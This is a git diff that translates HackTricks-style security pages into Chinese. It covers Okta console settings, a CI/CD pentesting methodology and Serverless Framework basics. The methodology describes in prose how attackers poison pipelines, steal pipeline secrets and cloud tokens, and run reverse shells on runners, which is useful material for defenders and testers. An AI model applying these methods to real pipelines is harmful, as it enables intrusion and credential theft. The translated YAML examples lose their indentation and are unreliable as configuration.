and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment. +**如果配置了任何身份提供者**,从攻击者和防御者的角度检查该配置,并**确保来源确实可信**,因为攻击者妥协它也可能获得对 Okta 环境的访问。 -### Delegated Authentication +### 委派身份验证 -Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server. +委派身份验证允许用户通过输入其组织的**Active Directory (AD) 或 LDAP** 服务器的凭据登录 Okta。 -Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting. +再次检查这一点,因为攻击者妥协组织的 AD 可能能够通过此设置转向 Okta。 -### Network +### 网络 -A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations. +网络区域是一个可配置的边界,您可以使用它来**授予或限制对您组织中计算机和设备的访问**,基于请求访问的**IP 地址**。您可以通过指定一个或多个单独的 IP 地址、IP 地址范围或地理位置来定义网络区域。 -After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**. +定义一个或多个网络区域后,您可以在全局会话策略、身份验证策略、VPN 通知和路由规则中**使用它们**。 -From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly. +从攻击者的角度来看,了解允许哪些 IP 是有趣的(并检查是否有任何**IP 比其他 IP 更特权**)。从攻击者的角度来看,如果用户应该从特定的 IP 地址或区域访问,请检查此功能是否正确使用。 -### Device Integrations +### 设备集成 -- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application. - - I haven't seen this used yet. TODO -- **Notification services**: I haven't seen this used yet. TODO +- **端点管理**:端点管理是可以应用于身份验证策略的条件,以确保受管理的设备可以访问应用程序。 +- 我还没有看到这被使用。待办事项 +- **通知服务**:我还没有看到这被使用。待办事项 ### API -You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**. +您可以在此页面创建 Okta API 令牌,并查看已**创建**的令牌、它们的**权限**、**过期**时间和**来源 URL**。请注意,API 令牌是使用创建令牌的用户的权限生成的,仅在创建它们的**用户**处于**活动**状态时有效。 -The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API. +**受信任的来源**授予您控制和信任的网站访问您的 Okta 组织,通过 Okta API。 -There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them. +不应有很多 API 令牌,因为如果有,攻击者可能会尝试访问它们并使用它们。 -## Workflow +## 工作流 -### Automations +### 自动化 -Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users. +自动化允许您创建基于在最终用户生命周期中发生的一组触发条件运行的自动化操作。 -For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta". +例如,一个条件可以是“Okta 中的用户不活动”或“Okta 中的用户密码过期”,而操作可以是“向用户发送电子邮件”或“在 Okta 中更改用户生命周期状态”。 -## Reports +## 报告 -### Reports +### 报告 -Download logs. They are **sent** to the **email address** of the current account. +下载日志。它们被**发送**到当前账户的**电子邮件地址**。 -### System Log +### 系统日志 -Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta. +在这里,您可以找到**用户执行的操作日志**,包含许多详细信息,如在 Okta 或通过 Okta 登录应用程序。 -### Import Monitoring +### 导入监控 -This can **import logs from the other platforms** accessed with Okta. +这可以**从其他平台导入日志**,通过 Okta 访问。 -### Rate limits +### 速率限制 -Check the API rate limits reached. +检查达到的 API 速率限制。 -## Settings +## 设置 -### Account +### 账户 -Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates. +在这里,您可以找到有关 Okta 环境的**通用信息**,例如公司名称、地址、**电子邮件账单联系人**、**电子邮件技术联系人**,以及谁应该接收 Okta 更新和哪种类型的 Okta 更新。 -### Downloads +### 下载 -Here you can download Okta agents to sync Okta with other technologies. +在这里,您可以下载 Okta 代理,以将 Okta 与其他技术同步。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md index 41899af04..5a8daf2cc 100644 --- a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md +++ b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md @@ -6,103 +6,99 @@ ## VCS -VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**: +VCS 代表 **版本控制系统**,该系统允许开发人员 **管理他们的源代码**。最常见的是 **git**,您通常会发现公司在以下 **平台** 中使用它: - Github - Gitlab - Bitbucket - Gitea -- Cloud providers (they offer their own VCS platforms) +- 云提供商(他们提供自己的 VCS 平台) ## CI/CD Pipelines -CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production. +CI/CD 管道使开发人员能够 **自动执行代码**,用于构建、测试和部署应用程序等各种目的。这些自动化工作流是通过 **特定操作** 触发的,例如代码推送、拉取请求或计划任务。它们有助于简化从开发到生产的过程。 -However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**. +然而,这些系统需要在某个地方 **执行**,通常需要 **特权凭据来部署代码或访问敏感信息**。 ## VCS Pentesting Methodology > [!NOTE] -> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code. +> 即使某些 VCS 平台允许创建管道,在本节中我们将仅分析对源代码控制的潜在攻击。 -Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse: +包含您项目源代码的平台包含敏感信息,用户需要非常小心在此平台内授予的权限。这些是 VCS 平台上攻击者可能滥用的一些常见问题: -- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks. -- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**. - - **Register**: Some platforms will just allow external users to create an account. - - **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example). - - **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo. -- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**. - - If no secret is in place, the attacker could abuse the webhook of the third party platform - - If the secret is in the URL, the same happens and the attacker also have the secret -- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid: - - Compromise the main branch to **compromise production**. - - Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines). - - **Compromise the pipeline** (check next section) +- **泄漏**:如果您的代码在提交中包含泄漏,并且攻击者可以访问该仓库(因为它是公开的或因为他有访问权限),他可能会发现这些泄漏。 +- **访问**:如果攻击者可以 **访问 VCS 平台内的帐户**,他可能会获得 **更多的可见性和权限**。 +- **注册**:某些平台只允许外部用户创建帐户。 +- **SSO**:某些平台不允许用户注册,但允许任何人使用有效的 SSO 访问(例如,攻击者可以使用他的 github 帐户进入)。 +- **凭据**:用户名+密码、个人令牌、ssh 密钥、Oauth 令牌、cookies……用户可以窃取多种类型的令牌以某种方式访问仓库。 +- **Webhooks**:VCS 平台允许生成 webhooks。如果它们没有用不可见的秘密 **保护**,则 **攻击者可能会滥用它们**。 +- 如果没有秘密,攻击者可能会滥用第三方平台的 webhook +- 如果秘密在 URL 中,情况也是如此,攻击者也会拥有秘密 +- **代码妥协**:如果恶意行为者对仓库有某种 **写入** 访问权限,他可能会尝试 **注入恶意代码**。为了成功,他可能需要 **绕过分支保护**。这些操作可以以不同的目标进行: +- 妥协主分支以 **妥协生产**。 +- 妥协主分支(或其他分支)以 **妥协开发者机器**(因为他们通常在自己的机器上执行测试、terraform 或其他操作)。 +- **妥协管道**(查看下一节) ## Pipelines Pentesting Methodology -The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\ -These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code. +定义管道的最常见方法是使用 **托管在仓库中的 CI 配置文件**。该文件描述了执行作业的顺序、影响流程的条件和构建环境设置。\ +这些文件通常具有一致的名称和格式,例如 — Jenkinsfile(Jenkins)、.gitlab-ci.yml(GitLab)、.circleci/config.yml(CircleCI)和位于 .github/workflows 下的 GitHub Actions YAML 文件。当触发时,管道作业 **从选定的源中拉取代码**(例如提交/分支),并 **根据 CI 配置文件中指定的命令** 对该代码执行操作。 -Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**. +因此,攻击者的最终目标是以某种方式 **妥协这些配置文件** 或 **它们执行的命令**。 ### PPE - Poisoned Pipeline Execution -The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands. +毒化管道执行(PPE)路径利用 SCM 仓库中的权限来操纵 CI 管道并执行有害命令。具有必要权限的用户可以修改 CI 配置文件或管道作业使用的其他文件,以包含恶意命令。这会“毒化” CI 管道,导致这些恶意命令的执行。 -For a malicious actor to be successful performing a PPE attack he needs to be able to: +为了使恶意行为者成功执行 PPE 攻击,他需要能够: -- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access). - - Note that sometimes an **external PR count as "write access"**. -- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**. - - For this, he might need to be able to **bypass branch protections**. +- 拥有 **对 VCS 平台的写入访问权限**,因为通常在执行推送或拉取请求时会触发管道。(查看 VCS 渗透测试方法以获取获取访问权限的摘要)。 +- 注意,有时 **外部 PR 计入“写入访问”**。 +- 即使他拥有写入权限,他也需要确保他可以 **修改 CI 配置文件或其他配置所依赖的文件**。 +- 为此,他可能需要能够 **绕过分支保护**。 -There are 3 PPE flavours: +有 3 种 PPE 风格: -- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed. -- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config). -- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR. - - **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**. +- **D-PPE**:**直接 PPE** 攻击发生在行为者 **修改将要执行的 CI 配置** 文件时。 +- **I-DDE**:**间接 PPE** 攻击发生在行为者 **修改** CI 配置文件所 **依赖的文件**(如 make 文件或 terraform 配置)时。 +- **公共 PPE 或 3PE**:在某些情况下,管道可以 **由没有写入访问权限的用户触发**(而且可能甚至不是组织的一部分),因为他们可以发送 PR。 +- **3PE 命令注入**:通常,CI/CD 管道会 **设置环境变量**,其中包含 **有关 PR 的信息**。如果该值可以被攻击者控制(如 PR 的标题),并且在 **危险位置**(如执行 **sh 命令**)中 **使用**,攻击者可能会 **在其中注入命令**。 ### Exploitation Benefits -Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation: +了解毒化管道的 3 种风格后,让我们检查攻击者在成功利用后可能获得的内容: -- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible. - - Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**. -- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further. - - **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**. - - **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**. - - **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**. - - **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further. -- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**. +- **秘密**:如前所述,管道的作业需要 **特权**(检索代码、构建、部署……),这些特权通常在秘密中 **授予**。这些秘密通常可以通过 **环境变量或系统内的文件** 访问。因此,攻击者总是会尝试提取尽可能多的秘密。 +- 根据管道平台,攻击者 **可能需要在配置中指定秘密**。这意味着如果攻击者无法修改 CI 配置管道(例如 **I-PPE**),他可能 **只能提取该管道拥有的秘密**。 +- **计算**:代码在某处执行,具体取决于执行的位置,攻击者可能能够进一步转移。 +- **本地**:如果管道在本地执行,攻击者可能会进入 **具有更多资源的内部网络**。 +- **云**:攻击者可以访问 **云中的其他机器**,还可以 **提取** IAM 角色/服务帐户 **令牌** 以获得 **进一步的云内部访问**。 +- **平台机器**:有时作业将在 **管道平台机器** 内执行,这些机器通常位于 **没有更多访问权限** 的云中。 +- **选择它**:有时 **管道平台将配置多个机器**,如果您可以 **修改 CI 配置文件**,则可以 **指示要运行恶意代码的位置**。在这种情况下,攻击者可能会在每台可能的机器上运行反向 shell,以尝试进一步利用。 +- **妥协生产**:如果您在管道内部,并且最终版本是从中构建和部署的,您可能会 **妥协将要在生产中运行的代码**。 ## More relevant info ### Tools & CIS Benchmark -- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time. +- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) 是一个开源工具,用于审计您的软件供应链堆栈的安全合规性,基于新的 [**CIS 软件供应链基准**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf)。审计集中在整个 SDLC 过程中,可以揭示从代码时间到部署时间的风险。 ### Top 10 CI/CD Security Risk -Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/) +查看这篇关于 Cider 的前 10 大 CI/CD 风险的有趣文章:[**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/) ### Labs -- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it -- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat) +- 在每个平台上,您可以本地运行,您将找到如何本地启动它,以便您可以根据需要进行配置以进行测试 +- Gitea + Jenkins 实验室:[https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat) ### Automatic Tools -- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code. +- [**Checkov**](https://github.com/bridgecrewio/checkov):**Checkov** 是一个用于基础设施即代码的静态代码分析工具。 ## References - [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md index bf1343702..a608574f4 100644 --- a/src/pentesting-ci-cd/serverless.com-security.md +++ b/src/pentesting-ci-cd/serverless.com-security.md @@ -2,302 +2,273 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -### Organization +### 组织 -An **Organization** is the highest-level entity within the Serverless Framework ecosystem. It represents a **collective group**, such as a company, department, or any large entity, that encompasses multiple projects, teams, and applications. +一个 **组织** 是 Serverless Framework 生态系统中的最高级别实体。它代表一个 **集体团体**,例如公司、部门或任何大型实体,涵盖多个项目、团队和应用程序。 -### Team +### 团队 -The **Team** are the users with access inside the organization. Teams help in organizing members based on roles. **`Collaborators`** can view and deploy existing apps, while **`Admins`** can create new apps and manage organization settings. +**团队** 是在组织内有访问权限的用户。团队根据角色帮助组织成员。**`合作者`** 可以查看和部署现有应用,而 **`管理员`** 可以创建新应用并管理组织设置。 -### Application +### 应用程序 -An **App** is a logical grouping of related services within an Organization. It represents a complete application composed of multiple serverless services that work together to provide a cohesive functionality. +一个 **应用** 是组织内相关服务的逻辑分组。它代表一个完整的应用程序,由多个无服务器服务组成,这些服务协同工作以提供一致的功能。 -### **Services** - -A **Service** is the core component of a Serverless application. It represents your entire serverless project, encapsulating all the functions, configurations, and resources needed. It's typically defined in a `serverless.yml` file, a service includes metadata like the service name, provider configurations, functions, events, resources, plugins, and custom variables. +### **服务** +一个 **服务** 是无服务器应用程序的核心组件。它代表您的整个无服务器项目,封装了所需的所有功能、配置和资源。它通常在 `serverless.yml` 文件中定义,服务包括元数据,如服务名称、提供者配置、功能、事件、资源、插件和自定义变量。 ```yaml service: my-service provider: - name: aws - runtime: nodejs14.x +name: aws +runtime: nodejs14.x functions: - hello: - handler: handler.hello +hello: +handler: handler.hello ``` -
Function -A **Function** represents a single serverless function, such as an AWS Lambda function. It contains the code that executes in response to events. - -It's defined under the `functions` section in `serverless.yml`, specifying the handler, runtime, events, environment variables, and other settings. +一个 **Function** 代表一个单一的无服务器函数,例如 AWS Lambda 函数。它包含响应事件时执行的代码。 +它在 `serverless.yml` 的 `functions` 部分下定义,指定处理程序、运行时、事件、环境变量和其他设置。 ```yaml functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get +hello: +handler: handler.hello +events: +- http: +path: hello +method: get ``` -
-Event +事件 -**Events** are triggers that invoke your serverless functions. They define how and when a function should be executed. - -Common event types include HTTP requests, scheduled events (cron jobs), database events, file uploads, and more. +**事件** 是触发您无服务器函数的触发器。它们定义了函数应该如何以及何时执行。 +常见的事件类型包括 HTTP 请求、计划事件(cron 作业)、数据库事件、文件上传等。 ```yaml functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - - schedule: - rate: rate(10 minutes) +hello: +handler: handler.hello +events: +- http: +path: hello +method: get +- schedule: +rate: rate(10 minutes) ``` -
-Resource +资源 -**Resources** allow you to define additional cloud resources that your service depends on, such as databases, storage buckets, or IAM roles. - -They are specified under the `resources` section, often using CloudFormation syntax for AWS. +**资源** 允许您定义您的服务所依赖的额外云资源,例如数据库、存储桶或 IAM 角色。 +它们在 `resources` 部分下指定,通常使用 AWS 的 CloudFormation 语法。 ```yaml resources: - Resources: - MyDynamoDBTable: - Type: AWS::DynamoDB::Table - Properties: - TableName: my-table - AttributeDefinitions: - - AttributeName: id - AttributeType: S - KeySchema: - - AttributeName: id - KeyType: HASH - ProvisionedThroughput: - ReadCapacityUnits: 1 - WriteCapacityUnits: 1 +Resources: +MyDynamoDBTable: +Type: AWS::DynamoDB::Table +Properties: +TableName: my-table +AttributeDefinitions: +- AttributeName: id +AttributeType: S +KeySchema: +- AttributeName: id +KeyType: HASH +ProvisionedThroughput: +ReadCapacityUnits: 1 +WriteCapacityUnits: 1 ``` -
-Provider +提供者 -The **Provider** object specifies the cloud service provider (e.g., AWS, Azure, Google Cloud) and contains configuration settings relevant to that provider. - -It includes details like the runtime, region, stage, and credentials. +**Provider** 对象指定云服务提供商(例如,AWS、Azure、Google Cloud),并包含与该提供商相关的配置设置。 +它包括运行时、区域、阶段和凭据等详细信息。 ```yaml yamlCopy codeprovider: - name: aws - runtime: nodejs14.x - region: us-east-1 - stage: dev +name: aws +runtime: nodejs14.x +region: us-east-1 +stage: dev ``` -
-Stage and Region - -The stage represents different environments (e.g., development, staging, production) where your service can be deployed. It allows for environment-specific configurations and deployments. +阶段和区域 +阶段代表不同的环境(例如,开发、预发布、生产),您的服务可以在这些环境中部署。它允许进行特定于环境的配置和部署。 ```yaml provider: - stage: dev +stage: dev ``` - -The region specifies the geographical region where your resources will be deployed. It's important for latency, compliance, and availability considerations. - +区域指定了您的资源将要部署的地理区域。这对于延迟、合规性和可用性考虑非常重要。 ```yaml provider: - region: us-west-2 +region: us-west-2 ``` -
-Plugins - -**Plugins** extend the functionality of the Serverless Framework by adding new features or integrating with other tools and services. They are defined under the `plugins` section and installed via npm. +插件 +**插件** 通过添加新功能或与其他工具和服务集成来扩展 Serverless Framework 的功能。它们在 `plugins` 部分定义,并通过 npm 安装。 ```yaml plugins: - - serverless-offline - - serverless-webpack +- serverless-offline +- serverless-webpack ``` -
-Layers - -**Layers** allow you to package and manage shared code or dependencies separately from your functions. This promotes reusability and reduces deployment package sizes. They are defined under the `layers` section and referenced by functions. + +**层** 允许您将共享代码或依赖项单独打包和管理。这促进了可重用性并减少了部署包的大小。它们在 `layers` 部分下定义,并由函数引用。 ```yaml layers: - commonLibs: - path: layer-common +commonLibs: +path: layer-common functions: - hello: - handler: handler.hello - layers: - - { Ref: CommonLibsLambdaLayer } +hello: +handler: handler.hello +layers: +- { Ref: CommonLibsLambdaLayer } +``` +
+ +
+ +变量和自定义变量 + +**变量** 通过允许使用在部署时解析的占位符来实现动态配置。 + +- **语法:** `${variable}` 语法可以引用环境变量、文件内容或其他配置参数。 + +```yaml +functions: +hello: +handler: handler.hello +environment: +TABLE_NAME: ${self:custom.tableName} +``` + +* **自定义变量:** `custom` 部分用于定义用户特定的变量和配置,这些变量和配置可以在 `serverless.yml` 中重复使用。 + +```yaml +custom: +tableName: my-dynamodb-table +stage: ${opt:stage, 'dev'} ```
-Variables and Custom Variables - -**Variables** enable dynamic configuration by allowing the use of placeholders that are resolved at deployment time. - -- **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters. - - ```yaml - functions: - hello: - handler: handler.hello - environment: - TABLE_NAME: ${self:custom.tableName} - ``` - -* **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`. - - ```yaml - custom: - tableName: my-dynamodb-table - stage: ${opt:stage, 'dev'} - ``` - -
- -
- -Outputs - -**Outputs** define the values that are returned after a service is deployed, such as resource ARNs, endpoints, or other useful information. They are specified under the `outputs` section and often used to expose information to other services or for easy access post-deployment. +输出 +**输出** 定义在服务部署后返回的值,例如资源 ARN、端点或其他有用信息。它们在 `outputs` 部分中指定,通常用于向其他服务公开信息或在部署后方便访问。 ```yaml ¡outputs: - ApiEndpoint: - Description: "API Gateway endpoint URL" - Value: - Fn::Join: - - "" - - - "https://" - - Ref: ApiGatewayRestApi - - ".execute-api." - - Ref: AWS::Region - - ".amazonaws.com/" - - Ref: AWS::Stage +ApiEndpoint: +Description: "API Gateway endpoint URL" +Value: +Fn::Join: +- "" +- - "https://" +- Ref: ApiGatewayRestApi +- ".execute-api." +- Ref: AWS::Region +- ".amazonaws.com/" +- Ref: AWS::Stage ``` -
-IAM Roles and Permissions - -**IAM Roles and Permissions** define the security credentials and access rights for your functions and other resources. They are managed under the `provider` or individual function settings to specify necessary permissions. +IAM角色和权限 +**IAM角色和权限** 定义了您函数和其他资源的安全凭证和访问权限。它们在 `provider` 或单个函数设置下进行管理,以指定必要的权限。 ```yaml provider: - [...] - iam: - role: - statements: - - Effect: 'Allow' - Action: - - 'dynamodb:PutItem' - - 'dynamodb:Get*' - - 'dynamodb:Scan*' - - 'dynamodb:UpdateItem' - - 'dynamodb:DeleteItem' - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} +[...] +iam: +role: +statements: +- Effect: 'Allow' +Action: +- 'dynamodb:PutItem' +- 'dynamodb:Get*' +- 'dynamodb:Scan*' +- 'dynamodb:UpdateItem' +- 'dynamodb:DeleteItem' +Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} ``` -
-Environment Variables - -**Variables** allow you to pass configuration settings and secrets to your functions without hardcoding them. They are defined under the `environment` section for either the provider or individual functions. +环境变量 +**变量** 允许您将配置设置和秘密传递给您的函数,而无需将它们硬编码。它们在提供者或单个函数的 `environment` 部分下定义。 ```yaml provider: - environment: - STAGE: ${self:provider.stage} +environment: +STAGE: ${self:provider.stage} functions: - hello: - handler: handler.hello - environment: - TABLE_NAME: ${self:custom.tableName} +hello: +handler: handler.hello +environment: +TABLE_NAME: ${self:custom.tableName} ``` -
-Dependencies - -**Dependencies** manage the external libraries and modules your functions require. They typically handled via package managers like npm or pip, and bundled with your deployment package using tools or plugins like `serverless-webpack`. +依赖 +**依赖** 管理您的函数所需的外部库和模块。它们通常通过像 npm 或 pip 这样的包管理器处理,并使用 `serverless-webpack` 等工具或插件与您的部署包捆绑在一起。 ```yaml plugins: - - serverless-webpack +- serverless-webpack ``` -
Hooks -**Hooks** allow you to run custom scripts or commands at specific points in the deployment lifecycle. They are defined using plugins or within the `serverless.yml` to perform actions before or after deployments. - +**Hooks** 允许您在部署生命周期的特定时刻运行自定义脚本或命令。它们通过插件或在 `serverless.yml` 中定义,以在部署之前或之后执行操作。 ```yaml custom: - hooks: - before:deploy:deploy: echo "Starting deployment..." +hooks: +before:deploy:deploy: echo "Starting deployment..." ``` -
-### Tutorial +### 教程 -This is a summary of the official tutorial [**from the docs**](https://www.serverless.com/framework/docs/tutorial): - -1. Create an AWS account (Serverless.com start in AWS infrastructure) -2. Create an account in serverless.com -3. Create an app: +这是官方教程的摘要 [**来自文档**](https://www.serverless.com/framework/docs/tutorial): +1. 创建一个 AWS 账户 (Serverless.com 在 AWS 基础设施上启动) +2. 在 serverless.com 创建一个账户 +3. 创建一个应用: ```bash # Create temp folder for the tutorial mkdir /tmp/serverless-tutorial @@ -313,26 +284,22 @@ serverless #Choose first one (AWS / Node.js / HTTP API) ## Create A New App ## Indicate a name like "tutorialapp) ``` - -This should have created an **app** called `tutorialapp` that you can check in [serverless.com](serverless.com-security.md) and a folder called `Tutorial` with the file **`handler.js`** containing some JS code with a `helloworld` code and the file **`serverless.yml`** declaring that function: +这应该创建了一个名为 **app** 的 `tutorialapp`,您可以在 [serverless.com](serverless.com-security.md) 中检查,并且创建了一个名为 `Tutorial` 的文件夹,其中包含文件 **`handler.js`**,该文件包含一些 JS 代码和 `helloworld` 代码,以及文件 **`serverless.yml`** 声明该函数: {{#tabs }} {{#tab name="handler.js" }} - ```javascript exports.hello = async (event) => { - return { - statusCode: 200, - body: JSON.stringify({ - message: "Go Serverless v4! Your function executed successfully!", - }), - } +return { +statusCode: 200, +body: JSON.stringify({ +message: "Go Serverless v4! Your function executed successfully!", +}), +} } ``` - {{#endtab }} {{#tab name="serverless.yml" }} - ```yaml # "org" ensures this Service is used with the correct Serverless Framework Access Key. org: testing12342 @@ -342,130 +309,122 @@ app: tutorialapp service: Tutorial provider: - name: aws - runtime: nodejs20.x +name: aws +runtime: nodejs20.x functions: - hello: - handler: handler.hello - events: - - httpApi: - path: / - method: get +hello: +handler: handler.hello +events: +- httpApi: +path: / +method: get ``` - {{#endtab }} {{#endtabs }} -4. Create an AWS provider, going in the **dashboard** in `https://app.serverless.com//settings/providers?providerId=new&provider=aws`. - 1. To give `serverless.com` access to AWS It will ask to run a cloudformation stack using this config file (at the time of this writing): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml) - 2. This template generates a role called **`SFRole-`** with **`arn:aws:iam::aws:policy/AdministratorAccess`** over the account with a Trust Identity that allows `Serverless.com` AWS account to access the role. +4. 创建一个 AWS 提供者,进入 `https://app.serverless.com//settings/providers?providerId=new&provider=aws` 的 **仪表板**。 +1. 为了给 `serverless.com` 访问 AWS 的权限,它会要求运行一个 cloudformation 堆栈,使用这个配置文件(在撰写本文时):[https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml) +2. 这个模板生成一个名为 **`SFRole-`** 的角色,具有 **`arn:aws:iam::aws:policy/AdministratorAccess`** 的权限,允许 `Serverless.com` AWS 账户访问该角色。
